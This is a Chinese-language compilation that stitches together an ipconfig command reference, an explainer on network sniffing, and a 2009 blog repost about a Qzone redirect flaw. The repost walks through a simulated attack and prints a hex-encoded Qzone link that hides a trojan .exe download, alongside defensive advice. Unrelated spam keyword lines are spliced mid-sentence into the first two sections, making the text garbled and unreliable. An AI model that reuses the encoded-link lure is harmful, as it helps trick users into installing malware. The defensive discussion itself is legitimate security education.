IPconfig命令大全
IPconfig命令大全
显示所有当前的TCP/IP网络配置值、刷新动态主机配置协议(DHCP)和域名系统(DNS)设置。使用不带参数的ipconfig可以显示所有适配器的IPv6地址或IPv4地址、子网掩码和默认网关。
语法
ipconfig[/all][/renew[Adapter]][/release[Adapter]][/flushdns][/di
splaydns][/registerdns][/showclassidAdapter][/setclassidAdapter[Class
ID]]
参数
/all显示所有适配器的完整TCP/IP配置信息。在没有该参数的情况下,ipconfig只显示各个适配器的IPv6地址或IPv4地址、子网掩码和默认网关值。适配器可以代
表
关于同志近三年现实表现材料材料类招标技术评分表图表与交易pdf视力表打印pdf用图表说话 pdf
物理接口(例如安装的网络适配器)或逻辑接口(例如拨号连接)。
/renew[Adapter]更新所有适配器(如果未指定适配器),或特定适配器(如果包含了Adapter参数)的DHCP配置。该参数仅在具有配置为自动获取IP地址的适配器的计算机上可用。要指定适配器名称,请键入使用不带参数的ipconfig命令显示的适配器名称。
/release[Adapter]发送DHCPRELEASE消息到DHCP服务器,以释放所有适配器(如果未指定适配器)或特定适配器(如果包含了Adapter参数)的当前DHCP配置并丢弃IP地址配置。该参数可以禁用配置为自动获取IP地址的适配器的TCP/IP。要指定适配器名称,请键入使用不带参数的ipconfig命令显示的适配器名称。
/flushdns刷新并重设DNS客户解析缓存的内容。在DNS故障排除期间,可以使用本过程从缓存中丢弃否定缓存项和任何其他动态添加项。
/displaydns显示DNS客户解析缓存的内容,包括从local Hosts文件预装载的
记录
混凝土 养护记录下载土方回填监理旁站记录免费下载集备记录下载集备记录下载集备记录下载
,以及最近获得的针对由计算机解析的名称查询的资源记录。DNS客户服务在查询配置的DNS服务器之前使用这些信息快速解析被频繁查询的名称。
/registerdns初始化计算机上配置的DNS名称和IP地址的手工动态注册。可以使用该参数对失败的DNS名称注册进行故障排除或解决客户和DNS服务器之间的动态更新问题,而不必重新启动客户端计算机。TCP/IP协议高级属性中的DNS设置可以确定DNS中注册了哪些名称。
/showclassidAdapter显示指定适配器的DHCP类别ID。要查看所有适配器的DHCP类别ID,请在Adapter位置使用星号(*)通配符。该参数仅在具有配置为自动获取IP地址的适配器的计算机上可用。
/setclassidAdapter[ClassID]配置特定适配器的DHCP类别ID。要设置所
,请在Adapter位置使用星号(*)通配符。该参数仅在有适配器的DHCP类别ID
具有配置为自动获取IP地址的适配器的计算机上可用。如果未指定DHCP类别ID,则会删除当前类别ID。
/?在命令提示符下显示帮助。
注释
ipconfig命令是等同于winipcfg命令,后者在Windows Millinnium Edition、Windows 98和Windows 95中提供。尽管Windows XP和Windows Server 2003家族没有提供与winipcfg等效的图形化命令,但是可以使用"网络连接"来查看和更新IP地址。要执行此操作,请打开"网络连接",右键单击某一网络连接,单击"状态",然后单击"支持"选项卡。
该命令最适用于配置为自动获取IP地址的计算机。它使用户可以确定哪些TCP/IP配置值是由DHCP、自动专用IP寻址(APIPA)和其他配置配置的。
如果Adapter名称包含空格,请在该适配器名称两边使用引号(即"Adapter名称")。
对于适配器名称,ipconfig可以使用星号(*)通配符字符指定名称为指定字符串开头的适配器,或名称包含有指定字符串的适配器。例如,Local*可以匹配所有以字符串Local开头的适配器,而*Con*可以匹配所有包含字符串Con的适配器。
只有当"Internet协议(TCP/IP)"协议在"网络连接"中安装为网络适配器属性的组件时,该命令才可用。
示例
要显示所有适配器的基本TCP/IP配置,请键入:ipconfig
要显示所有适配器的完整TCP/IP配置,请键入:ipconfig/all
仅更新"本地连接"适配器的由DHCP分配IP地址的配置,请键入:ipconfig/renew"Local Area Connection"
要在排除DNS的名称解析故障期间刷新DNS解析器缓存,请键入:ipconfig/flushdns
要显示名称以Local开头的所有适配器的DHCP类别ID,请键入:ipconfig/showclassid Local*
要将"本地连接"适配器的DHCP类别ID设置为TEST,请键入:ipconfig/setclassid"Local Area Connection"TEST
网络监听网络监听工具是提供给管理员的一类管理工具。使用这种工具,可以监视网络的状态、数据流动情况以及网络上传输的信息。
但是网络监听工具也是黑客们常用的工具。当信息以明文的形式在网络上传输时,便可以使用网络监听的方式来进行攻击。将网络接口设置在监听模式,便可以源源不断地将网上传输的信息截获。
网络监听可以在网上的任何一个位置实施,如局域网中的一台主机、网关上或远程网的调制解调器之间等。黑客们用得最多的是截获用户的口令。
什么是网络监听
网络监听是黑客们常用的一种方法。当成功地登录进一台网络上的主机,并取得了这台主机的超级用户的权限之后,往往要扩大战果,尝试登录或者夺取网络中其他主机的控制友。而网络监听则是一种最简单而且最有效的方法,它常常能轻易地获得用其他方法很难获得的信息。
在网络上,监听效果最好的地方是在网关、路由器、防火墙一类的设备处,通常由网络管理员来操作。使用最方便的是在一个以太网中的任何一台上网的主机上,这是大多数黑客的做法。
以太网中可以监听的原因
在电话线路和无线电、微波中监听传输的信息比较好理解,但是人们常常不太理解为什么局域网中可以进行监听。甚至有人问:能不能监听不在同一网段的信息。下面就讲述在以太网中进行监听的一些原理。在令牌环中,道理是相似的。
对于一个施行网络攻击的人来说,能攻破网关、路由器、防火墙的情况极为少见,在这里完全可以由
安全管理
企业安全管理考核细则加油站安全管理机构环境和安全管理程序安全管理考核细则外来器械及植入物管理
员安装一些设备,对网络进行监控,或者使用一些专门的设备,运行专门的监听软件,并防止任何非法访关。然而,潜入一台不引人注意的计算机中,悄悄地运行一个监听程序,一个黑客是完全可以做到的。监听是非常消耗CPU资源的,在一个担负繁忙任务的计算机中进行监听,可以立即被管理员发现,因为他发现计算机的响应速度令人惊奇慢。
对于一台连网的计算机,最方便的是在以太网中进行监听,只须安装一个监听软件,然后就可以坐在机器旁浏览监听到的信息了。
以太网协议的工作方式为将要发送的数据包发往连在一起的所有主机。在包头中包含着应该接收数据包的主机的正确地址。因此,只有与数据包中目标地址一致的那台主机才能接收信包。但是,当主机工在监听模式下,无论数据包中的目标物理地址是什么,主机都将接收。
在Internet上,有许多这样的局域网。几台甚至十几台主机通过一条电缆一个集线器连在一起。在协议的高层或用户看来,当同一网络中的两台主机通
信时,源主机将写有目的主机IP地址的数据包发向网关。但是,这种数据包并不能在协议栈的高层直接发送出去。要发送的数据包必须从TCP/IP协议的IP层交给网络接口,即数据链路层。
网络接口不能识别IP地址。在网络接口,由IP层来的带有IP地址的数据包又增加了一部分信息:以太帧的帧头。在帖头中,有两个域分别为只有网络接口才能识别的源主机和目的主机的物理地址,这是一个48位的地址。这个48位的地址是与IP地址对应的。也就是说,一个IP地址,必然对应一个物理地址。对于作为网关的主机,由于它连接了多个网络,因此它同时具有多个IP地址,在每个网络中,它都有一个。发向局域网之外的帧中携带的是网关的物理地址。
在以太网中,填写了物理地址的帧从网络接口中,也就是从网卡中发送出去,传送到物理的线路上。如果局域网是由一条粗缆或细缆连接机而成,则数字信号在电缆上传输,信号能够到达线路上的每一台主机。当使用集线器时,发送出去的信号到达集线器,由集线器再发向连接在信线器上的每一条线路。于是,在物理线路上传输的数字信号也能到达连接在集线器上的每一主机。
数字信号到达一台主机的网络接口时,在正常情况下,网络接口读入数据帧,进行检查,如果数据帧中携带的确良物理地址是自己的,或者物理地址是广播地址,则将数据帧交给上层协议软件,也就是IP层软件,否则就将这个帧丢弃。对于每一个到达网络接口的数据帧,都要进行这个过程。然而,当主机工作在监听模式下,则所有的数据帧都将被交给上层协议软件处理。
局域网的这种工作方式,一个形象的例子是,大房间就像是一个共享的信道,里面的每个人好像是一台主机。人们所说的话是信息包,在大房间中到处传播。当我们对其中某个人说话时,所有的人都能听到。但只有名字相同的那个人,才会对这些话语做出反映,进行处理。其余的人听到了这些谈话,只能从发呆中猜测,是否在监听他人的谈话。
当连接在同一条电缆或集线器上的主机被逻辑地分为几个子网时,如果一台主机处于监听模式下,它还能接收到发向与自己不在同一子网(使用了不同的掩码、IP地址和网关)的主机的那些信包。也就是说,在同一条物理信道上传输的所有信息都可以被接收到。
许多人会问:能不能监听不在同一个网段计算机传输的信息。答案是否定的,一台计算机只能监听经过自己网络接口的那些信包。否则,我们将能监听到整个Internet,情形会多么可怕。
要使主机工作在监听模式下,需要向网络接口(Interface)发送I/O控制命令,将其设置为监听模式。在UNIX系统中,发送这些命令需要超级用户的权限。这一点限制了在UNIX系统中,普通用户是不能进行网络监听的。只有获得超级用户权限,才能进行网络监听。但是,在上网的Windows 95中,则没有这个限制。只要运行这一类的监听软件即可。同时,在微机上运行的这类软件具的操作方便,对监听到信息的综合能力强的特点。
目前的绝大多数计算机网络使用共享的通信信道。从上面的讨论中,我们知道,通信信道的共享意味着,计算机有可能接收发向另一台计算机的信息。
另外,要说明的是,Internet中使用的大部分协议都是很早设计的,许多协议的实现都是基于一种非常友好的,通信的双方充分信任的基础之上。因此,直到现在,网络安全还是非常脆弱的。在通常的网络环境下,用户的所有信息,包手户头和口令信息都是以明文的方式在网上传输。因此,对于一个网络黑客和网络攻击者进行网络监听,获得用户的各种信息并不是一件很困难的事。只要具有初步的网络和TCP/IP协议知识,便能轻易地从监听到的信息中提取出感兴趣的部分。
网络监听常常要保存大量的信息,对收集的信息进行大量的整理工作,因此,正在进行监的机器对用户的请求响应很慢。
首先,网络监听软件运行时,需要消耗大量的处理器时间,如果在此时,就详细地分析包中的内容,许多包就会来不信接收而漏掉。因此,网络监听软件通常都是将监听到的包存放在文件中,待以后再分析。
其次,网络中的数据包非常复杂,两台主机之间即使连续发送和接受数据包,在监听到的结果中,中间必然会夹杂了许多别的主机交互的数据包。监听软件将同一TCP会话的包整理到一起,已经是很不错了。如果还希望将用户的详细信息整理出眯,需要根据协议对包进行大量的分析。面对网络上如此众多的协议,这个监听软件将会十分庞大。
其实,找这些信息并不是一件难事。只要根据一定的规律,很容易将有用的信息一一提取出来。
空间挂马(2009-08-27 20:55:51)转载标签:电脑跨站挂马qq号码qq空间分类:IT文萃
由于QQ在桌面IM领域占据着绝对霸主地位,在其身上衍生的各种产品也变得日益流行,而Qzone也逐渐成为网友书写日志和展示个性的地方。因此,Qzone的安全性也备受关注。不过,Qzone近日却爆出了一个跨站漏洞,这个漏洞非常容易被黑客利用。那么,黑客一般会如何通过这个漏洞来攻击普通用户呢?作为用户,我们又如何来防范这一漏洞的危害呢?
一、模拟黑客攻击
这里,我们首先来了解这个漏洞的具体情况。Qzone的跨站漏洞是网友无意中打开类似"qq.com/QQ"号码?url=任意字母"时发现的,这时网页显示为一个框架网页,中间为"无法打开网页"的空白页面(如图1);然而,当输入类似"qq.com/QQ"号码?url=的地址时却可以正常显示,这时url后的网址其实在幕后是加载的。那么,Qzone的跨站漏洞又是如何被黑客作为木马的媒介的呢?
第一步:黑客需要对该地址进行乔装改扮一番。比如:网页木马的url为"。黑客会使用URl加密技术来为木马地址作掩护,常用的方法是把url地址转换为16进制,这里以ASCII码随心换为例(如图2)进行示范。
第二步:黑客将Qzone的地址设置为"qq.com/QQ"号
码?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%75%6D%61%2E%63%6F%6D%2F%6
D%75%6D%61%2E%65%78%65"并在网页上贴出Qzone的地址来引诱网友点击,用户往往点击了该地址下载运行了木马还蒙在鼓里。
二、如何防范Qzone攻击
方法1:既然这一跨站漏洞这么隐蔽,用户感染的几率也不会低。我们需要如何来防范这一漏洞可能造成的危害呢?做到不感染病毒,未雨绸缪是最有效果的。因此,我们在访问网友的Qzone前,要多长几个心眼,要观察其网址的形式。
一般正常的Qzone的地址是"qq.com/"号码"或者"号码.qzone.qq.com/"形式的,如果出现"qq.com/QQ"号码?url="的地址就要谨慎了,Qzone也可能出现类似"qq.com/"号码/?url=http%3A//photo.qq.com/tips_jump.htm%23uin%3D
号码%26albumid%3D 393029702%26photoid%3D"的地址,如果地址里面完全没有QQ的地址段,那么为了防止下载运行网页木马,可以将url后的字符输入到ASCII码随心换进行转换(如果是像以上地址的格式,可以将%后的十六进制字符逐个进行转换来获得完整地址),如果url指向可执行文件就不能点击了。
方法2:为了防止系统被种植网页木马,还可以安装杀毒软件和防火墙并需要开始实文件和网络监控,这样即使下载了网页木马也会被清除。如果发现了可疑的Qzone地址要及时举报,让黑客成为过街老鼠,毫无藏身之处。
小结:Qzone的跨站漏洞被用来种植木马具有受众广的特点,Qzone的地址经过加密化装后,又有几个人会仔细地进行甄别呢?因此,利用人们偷窥人家隐私空间的好奇心来传播木马是很有效果的。
其实,要防范Qzone地址在你的电脑种植木马也不难,最简单的方法就是只点击QQ资料里的Qzone地址,不去其他网站点击就可以了。另外,需要使用具有防范IE漏洞的安全工具和杀毒软件来查杀这类木马的下载安装,如:瑞星卡卡。携带木马的Qzone地址一经发现要马上通知网友,决不姑息,不让其他人成为黑客的牺牲品。同时,每次Qzone提示升级我们也最好升级不用嫌麻烦而取消升级,以免被黑客利用其他未知的漏洞。